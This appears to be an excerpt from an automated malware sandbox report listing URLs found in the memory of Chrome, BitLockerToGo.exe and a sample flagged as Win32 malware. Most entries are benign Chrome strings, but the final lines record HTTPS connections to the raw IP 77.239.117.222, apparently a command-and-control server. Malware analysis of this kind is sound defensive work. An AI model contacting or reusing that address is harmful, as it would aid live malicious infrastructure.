              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
              Source: chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
              Source: chrome.exe, 00000006.00000003.2649423528.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2646214583.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2721845988.000042E800BE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
              Source: chrome.exe, 00000006.00000002.2717937549.000042E80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
              Source: chrome.exe, 00000006.00000002.2719647077.000042E80063C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
              Source: chrome.exe, 00000006.00000002.2719647077.000042E80063C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117B
              Source: chrome.exe, 00000006.00000002.2717393755.000042E800082000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: chrome.exe, 00000006.00000003.2649395464.000042E800380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
              Source: chrome.exe, 00000006.00000003.2654243336.000042E800F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2653956544.000042E801030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654105832.000042E801040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2655293147.000042E80105C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
              Source: chrome.exe, 00000006.00000003.2654243336.000042E800F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657450118.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2653956544.000042E801030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657400461.000042E800D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654105832.000042E801040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658459352.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654178285.000042E801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658512234.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659278566.000042E801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657519614.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657629442.000042E800F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2655293147.000042E80105C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718219018.000042E8002FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chrome.exe, 00000006.00000003.2654243336.000042E800F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657450118.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2653956544.000042E801030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657400461.000042E800D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654105832.000042E801040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658459352.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654178285.000042E801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658512234.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659278566.000042E801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657519614.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657629442.000042E800F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2655293147.000042E80105C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718219018.000042E8002FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chrome.exe, 00000006.00000003.2654243336.000042E800F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657450118.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2653956544.000042E801030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657400461.000042E800D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654105832.000042E801040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658459352.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654178285.000042E801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658512234.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659278566.000042E801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657519614.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657629442.000042E800F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2655293147.000042E80105C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718219018.000042E8002FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chrome.exe, 00000006.00000003.2654243336.000042E800F60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657450118.000042E800A0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2653956544.000042E801030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657400461.000042E800D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654105832.000042E801040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658459352.000042E800F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2654178285.000042E801090000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2658512234.000042E80072C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659278566.000042E801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657519614.000042E800824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2657629442.000042E800F90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2655293147.000042E80105C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000003.2659385093.000042E80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000006.00000002.2718219018.000042E8002FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chrome.exe, 00000006.00000002.2725042227.000042E800E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
              Source: chrome.exe, 00000006.00000002.2720375769.000042E80087C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
              Source: chrome.exe, 00000006.00000002.2720869382.000042E8009B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
              Source: chrome.exe, 00000006.00000002.2720869382.000042E8009B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/a
              Source: chromecache_70.8.drString found in binary or memory: http://www.broofa.com
              Source: chrome.exe, 00000006.00000002.2721069161.000042E800A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/c
              Source: BitLockerToGo.exe, 00000004.00000002.3075645700.0000000002D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222/k
              Source: SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000003.2202609846.000000000A46A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2206546529.000000000A47A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Malware-gen.26093.20806.exe, 00000000.00000002.2204909957.000000000A154000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.3074742779.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://77.239.117.222:443
